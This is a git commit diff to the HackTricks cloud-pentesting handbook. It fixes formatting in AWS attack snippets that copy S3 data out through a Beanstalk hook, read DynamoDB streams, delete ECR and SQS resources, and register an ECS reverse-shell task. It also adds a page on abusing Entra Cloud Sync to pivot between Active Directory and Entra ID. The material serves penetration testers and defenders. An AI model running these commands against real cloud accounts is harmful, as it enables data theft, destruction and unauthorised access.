impr

carlospolop · carlospolop · commit 46a0637e05a8 · 2025-07-18T14:59:34.000+02:00
diff --git a/searchindex.js b/searchindex.js
diff --git a/src/SUMMARY.md b/src/SUMMARY.md
@@ -442,11 +442,13 @@
   - [Az - Permissions for a Pentest](pentesting-cloud/azure-security/az-permissions-for-a-pentest.md)
   - [Az - Lateral Movement (Cloud - On-Prem)](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/README.md)
     - [Az AD Connect - Hybrid Identity](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/README.md)
-      - [Az- Synchronising New Users](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/az-synchronising-new-users.md)
-      - [Az - Default Applications](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/az-default-applications.md)
+      - [Az - Synchronising New Users](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/az-synchronising-new-users.md)
       - [Az - Cloud Kerberos Trust](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/az-cloud-kerberos-trust.md)
       - [Az - Federation](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/federation.md)
-      - [Az - PHS - Password Hash Sync](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/phs-password-hash-sync.md)
+      - [Az - Cloud Sync](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/az-cloud-sync.md)
+      - [Az - Connect Sync](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/az-connect-sync.md)
+      - [Az - Default Applications](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/az-default-applications.md)
+      - [Az - Domain Services](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/az-domain-services.md)
       - [Az - PTA - Pass-through Authentication](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/pta-pass-through-authentication.md)
       - [Az - Seamless SSO](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/seamless-sso.md)
       - [Az - Arc vulnerable GPO Deploy Script](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-arc-vulnerable-gpo-deploy-script.md)
diff --git a/src/pentesting-ci-cd/serverless.com-security.md b/src/pentesting-ci-cd/serverless.com-security.md
@@ -109,7 +109,7 @@ The **Provider** object specifies the cloud service provider (e.g., AWS, Azure,
 It includes details like the runtime, region, stage, and credentials.
 
 ```yaml
-yamlCopy codeprovider:
+provider:
   name: aws
   runtime: nodejs14.x
   region: us-east-1
@@ -767,7 +767,7 @@ Detailed error messages can leak sensitive information about the infrastructure
 - **Generic Error Messages:** Avoid exposing internal details in error responses.
 
   ```javascript
-  javascriptCopy code// Example in Node.js
+// Example in Node.js
   exports.hello = async (event) => {
     try {
       // Function logic
diff --git a/src/pentesting-cloud/aws-security/aws-persistence/aws-elastic-beanstalk-persistence.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-elastic-beanstalk-persistence.md
@@ -30,7 +30,7 @@ Instead of changing the code on the actual version, the attacker could deploy a
 Elastic Beanstalk provides lifecycle hooks that allow you to run custom scripts during instance provisioning and termination. An attacker could **configure a lifecycle hook to periodically execute a script that exfiltrates data or maintains access to the AWS account**.
 
 ```bash
-bashCopy code# Attacker creates a script that exfiltrates data and maintains access
+# Attacker creates a script that exfiltrates data and maintains access
 echo '#!/bin/bash
 aws s3 cp s3://sensitive-data-bucket/data.csv /tmp/data.csv
 gzip /tmp/data.csv
diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-dynamodb-post-exploitation.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-dynamodb-post-exploitation.md
@@ -312,7 +312,7 @@ An attacker with these permissions can **enable a stream on a DynamoDB table, up
 1. Enable a stream on a DynamoDB table:
 
 ```bash
-bashCopy codeaws dynamodb update-table \
+aws dynamodb update-table \
     --table-name TargetTable \
     --stream-specification StreamEnabled=true,StreamViewType=NEW_AND_OLD_IMAGES \
     --region <region>
@@ -321,15 +321,15 @@ bashCopy codeaws dynamodb update-table \
 2. Describe the stream to obtain the ARN and other details:
 
 ```bash
-bashCopy codeaws dynamodb describe-stream \
+aws dynamodb describe-stream \
     --table-name TargetTable \
     --region <region>
 ```
 
 3. Get the shard iterator using the stream ARN:
 
 ```bash
-bashCopy codeaws dynamodbstreams get-shard-iterator \
+aws dynamodbstreams get-shard-iterator \
     --stream-arn <stream_arn> \
     --shard-id <shard_id> \
     --shard-iterator-type LATEST \
@@ -339,7 +339,7 @@ bashCopy codeaws dynamodbstreams get-shard-iterator \
 4. Use the shard iterator to access and exfiltrate data from the stream:
 
 ```bash
-bashCopy codeaws dynamodbstreams get-records \
+aws dynamodbstreams get-records \
     --shard-iterator <shard_iterator> \
     --region <region>
 ```
diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ecr-post-exploitation.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ecr-post-exploitation.md
@@ -60,7 +60,7 @@ https://book.hacktricks.wiki/en/generic-methodologies-and-resources/basic-forens
 An attacker with any of these permissions can **create or modify a lifecycle policy to delete all images in the repository** and then **delete the entire ECR repository**. This would result in the loss of all container images stored in the repository.
 
 ```bash
-bashCopy code# Create a JSON file with the malicious lifecycle policy
+# Create a JSON file with the malicious lifecycle policy
 echo '{
   "rules": [
     {
diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-sqs-post-exploitation.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-sqs-post-exploitation.md
@@ -38,7 +38,7 @@ aws sqs change-message-visibility --queue-url <value> --receipt-handle <value> -
 An attacker could delete an entire SQS queue, causing message loss and impacting applications relying on the queue.
 
 ```arduino
-Copy codeaws sqs delete-queue --queue-url <value>
+aws sqs delete-queue --queue-url <value>
 ```
 
 **Potential Impact**: Message loss and service disruption for applications using the deleted queue.
@@ -48,7 +48,7 @@ Copy codeaws sqs delete-queue --queue-url <value>
 An attacker could purge all messages from an SQS queue, leading to message loss and potential disruption of applications relying on those messages.
 
 ```arduino
-Copy codeaws sqs purge-queue --queue-url <value>
+aws sqs purge-queue --queue-url <value>
 ```
 
 **Potential Impact**: Message loss and service disruption for applications relying on the purged messages.
@@ -79,7 +79,7 @@ aws sqs untag-queue --queue-url <value> --tag-keys <key>
 An attacker could revoke permissions for legitimate users or services by removing policies associated with the SQS queue. This could lead to disruptions in the normal functioning of applications that rely on the queue.
 
 ```arduino
-arduinoCopy codeaws sqs remove-permission --queue-url <value> --label <value>
+aws sqs remove-permission --queue-url <value> --label <value>
 ```
 
 **Potential Impact**: Disruption of normal functioning for applications relying on the queue due to unauthorized removal of permissions.
diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-apigateway-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-apigateway-privesc.md
@@ -95,7 +95,7 @@ aws apigateway create-deployment --rest-api-id $API_ID --stage-name Prod
 An attacker with the permission `apigateway:UpdateVpcLink` can **modify an existing VPC Link to point to a different Network Load Balancer, potentially redirecting private API traffic to unauthorized or malicious resources**.
 
 ```bash
-bashCopy codeVPC_LINK_ID="your-vpc-link-id"
+VPC_LINK_ID="your-vpc-link-id"
 NEW_NLB_ARN="arn:aws:elasticloadbalancing:region:account-id:loadbalancer/net/new-load-balancer-name/50dc6c495c0c9188"
 
 # Update the VPC Link
diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecr-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecr-privesc.md
@@ -67,7 +67,7 @@ Like the previoous section, but for public repositories.\
 An attacker can **modify the repository policy** of an ECR Public repository to grant unauthorized public access or to escalate their privileges.
 
 ```bash
-bashCopy code# Create a JSON file with the malicious public repository policy
+# Create a JSON file with the malicious public repository policy
 echo '{
   "Version": "2008-10-17",
   "Statement": [
diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecs-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecs-privesc.md
@@ -259,7 +259,7 @@ TODO: Is it possible to register an instance from a different AWS account so tas
 An attacker with the permissions `ecs:CreateTaskSet`, `ecs:UpdateServicePrimaryTaskSet`, and `ecs:DescribeTaskSets` can **create a malicious task set for an existing ECS service and update the primary task set**. This allows the attacker to **execute arbitrary code within the service**.
 
 ```bash
-bashCopy code# Register a task definition with a reverse shell
+# Register a task definition with a reverse shell
 echo '{
   "family": "malicious-task",
   "containerDefinitions": [
diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sqs-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sqs-privesc.md
@@ -15,7 +15,7 @@ For more information check:
 An attacker could use this permission to grant unauthorized users or services access to an SQS queue by creating new policies or modifying existing policies. This could result in unauthorized access to the messages in the queue or manipulation of the queue by unauthorized entities.
 
 ```bash
-cssCopy codeaws sqs add-permission --queue-url <value> --actions <value> --aws-account-ids <value> --label <value>
+aws sqs add-permission --queue-url <value> --actions <value> --aws-account-ids <value> --label <value>
 ```
 
 **Potential Impact**: Unauthorized access to the queue, message exposure, or queue manipulation by unauthorized users or services.
diff --git a/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/README.md b/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/README.md
@@ -61,3 +61,5 @@ Get-ADSyncConnector
 
 
 
+
+
diff --git a/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/az-cloud-sync.md b/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/az-cloud-sync.md
@@ -0,0 +1,88 @@
+# Az - Cloud Sync
+
+{{#include ../../../../banners/hacktricks-training.md}}
+
+
+## Basic Information
+
+**Cloud Sync** is basically the new way of Azure to **synchronize the users from AD into Entra ID**.
+
+[From the docs:](https://learn.microsoft.com/en-us/entra/identity/hybrid/cloud-sync/what-is-cloud-sync) Microsoft Entra Cloud Sync is a new offering from Microsoft designed to meet and accomplish your hybrid identity goals for synchronization of users, groups, and contacts to Microsoft Entra ID. It accomplishes this by using the Microsoft Entra cloud provisioning agent instead of the Microsoft Entra Connect application. However, it can be used alongside Microsoft Entra Connect Sync.
+
+### Principals Generated
+
+In order for this to work some principals are created in both Entra ID and the On-Premise directry:
+
+- In Entra ID the user `On-Premises Directory Synchronization Service Account` (`ADToAADSyncServiceAccount@carloshacktricks.onmicrosoft.com`) is created with the role **`Directory Synchronization Accounts`** (`d29b2b05-8046-44ba-8758-1e26182fcf32`). 
+
+> [!WARNING]
+> This role used to have a lot of privileged permissions and it could be used to [**escalate privileges even to global admin**](https://medium.com/tenable-techblog/stealthy-persistence-with-directory-synchronization-accounts-role-in-entra-id-63e56ce5871b). However, Microsoft decided to remove all the privileges of this role and assign it just a new one **`microsoft.directory/onPremisesSynchronization/standard/read`** which doesn't really allow to perform any privileged action (like modifying the password or atribbutes of a user or adding a new credential to a SP).
+
+- In Entra ID also the group **`AAD DC Administrators`** is created without members or owners. This group is useful if [`Microsoft Entra Domain Services`](./az-domain-services.md) is used.
+
+- In the AD, either the Service Account **`provAgentgMSA`** is created with a SamAcountName like **`pGMSA_<id>$@domain.com`** (`Get-ADServiceAccount -Filter * | Select Name,SamAccountName`), or a custom one with [**these permissions is needed**](https://learn.microsoft.com/en-us/entra/identity/hybrid/cloud-sync/how-to-prerequisites?tabs=public-cloud#custom-gmsa-account). Usually the default one is created.
+
+> [!WARNING]
+> Among other permissions the Service Account **`provAgentgMSA`** has DCSync permisions, allowing **anyone that compromises it to compromise the whole directory**. For more information about [DCSync check this](https://book.hacktricks.wiki/en/windows-hardening/active-directory-methodology/dcsync.html).
+
+> [!NOTE]
+> Domain admins are not replicated because the Domain Admin group has the **`adminCount` attribute to 1**. But other users might be replicated and attackable if you compromises them from EntraID: https://www.silverfort.com/blog/exploiting-weaknesses-in-entra-id-account-synchronization-to-compromise-the-on-prem-environment/
+
+## Password Sychronization
+
+The section is very similar to the one from:
+
+{{#ref}}
+az-connect-sync.md
+{{#endref}}
+
+- **Password hash synchronization** can be enabled so users will be able to **login into Entra ID using their passwords from AD**. Moreover, whenever a password is modified in AD, it'll be updated in Entra ID.
+- **Password writeback** can also be enabled, allowing users to modify their password in Entra ID automatically synchronizing their password in the on-premise domain. But according to the [current docs](https://learn.microsoft.com/en-us/entra/identity/authentication/tutorial-enable-sspr-writeback#configure-password-writeback), for this is needed to use the Connect Agent, so take a look to the [Az Connect Sync section](./az-connect-sync.md) for more information.
+
+
+## Pivoting
+
+### AD --> Entra ID
+
+- If the AD users are being synced from the AD to Entra ID, pivoting from AD to Entra ID is straightforward, just **compromise some user's password or change some user's password or create a new user and wait until it's synced into the Entra ID directory (usually only a few mins)**.
+
+For more information about how to compromise an Active Directory check:
+
+{{#ref}}
+https://book.hacktricks.wiki/en/windows-hardening/active-directory-methodology/index.html
+{{#endref}}
+
+> [!NOTE]
+> Note that There isn't any way to give Azure or EntraID roles to synced users based on its attributtes for example in the Cloud Sync configurations. However, in order to automatically grant permissions to synced users **dynamic groups might be used**, so always check for dynamic rules and potential ways to abuse them:
+
+{{#ref}}
+../../az-privilege-escalation/az-entraid-privesc/dynamic-groups.md
+{{#endref}}
+
+### Entra ID --> AD
+
+- If **Password Writeback** is enabled, you could modify the password of some users from Entra ID and if you have access to the AD network, conenct using them. For more info check the [Az Connect Sync section](./az-connect-sync.md) section for more information as the password writeback is configured using that agent.
+
+- At this point in time Cloud Sync also allows **"Microsoft Entra ID to AD"**, but after too much time I found that it CANNOT synchronize EntraID users to AD and that it can only synchronize users from EntraID that were synchronized with the password hash and come from a domain that belong to the same domain forest as the domain we are synchonizing to as you can read in [https://learn.microsoft.com/en-us/entra/identity/hybrid/group-writeback-cloud-sync#supported-groups-and-scale-limits](https://learn.microsoft.com/en-us/entra/identity/hybrid/group-writeback-cloud-sync#supported-groups-and-scale-limits):
+
+> - These groups can only contain on-premises synchronized users and / or additional cloud created security groups.
+> - The on-premises user accounts that are synchronized and are members of this cloud created security group, can be from the same domain or cross-domain, but they all must be from the same forest.
+
+So the attack surface (and usefulness) of this service is greately reduced as an attacker would need to compromise the initial AD from where the users are being synhronized in order to compromise a user in the other domain (and both must be inte same forest aparently).
+
+
+### Enumeration
+
+```bash
+# Get all the configured cloud sync agents (usually one per on-premise domain)
+## In the machine name of each you can infer the name of the domain
+az rest \
+  --method GET \
+  --uri "https://graph.microsoft.com/beta/onPremisesPublishingProfiles('provisioning')/agents/?\$expand=agentGroups" \
+  --headers "Content-Type=application/json"
+```
+
+
+
+{{#include ../../../../banners/hacktricks-training.md}}
+
diff --git a/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/az-connect-sync.md b/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/az-connect-sync.md
diff --git a/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/az-domain-services.md b/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/az-domain-services.md
diff --git a/src/pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/README.md b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/README.md
diff --git a/src/pentesting-cloud/kubernetes-security/kubernetes-opa-gatekeeper/README.md b/src/pentesting-cloud/kubernetes-security/kubernetes-opa-gatekeeper/README.md
diff --git a/src/pentesting-cloud/kubernetes-security/kubernetes-pivoting-to-clouds.md b/src/pentesting-cloud/kubernetes-security/kubernetes-pivoting-to-clouds.md

Original file line number	Diff line number	Diff line change
`@@ -60,7 +60,7 @@ https://book.hacktricks.wiki/en/generic-methodologies-and-resources/basic-forens`
`60`	`60`	`An attacker with any of these permissions can create or modify a lifecycle policy to delete all images in the repository and then delete the entire ECR repository. This would result in the loss of all container images stored in the repository.`
`61`	`61`
`62`	`62`	```bash
`63`		`-bashCopy code# Create a JSON file with the malicious lifecycle policy`
	`63`	`+# Create a JSON file with the malicious lifecycle policy`
`64`	`64`	`echo '{`
`65`	`65`	`"rules": [`
`66`	`66`	`{`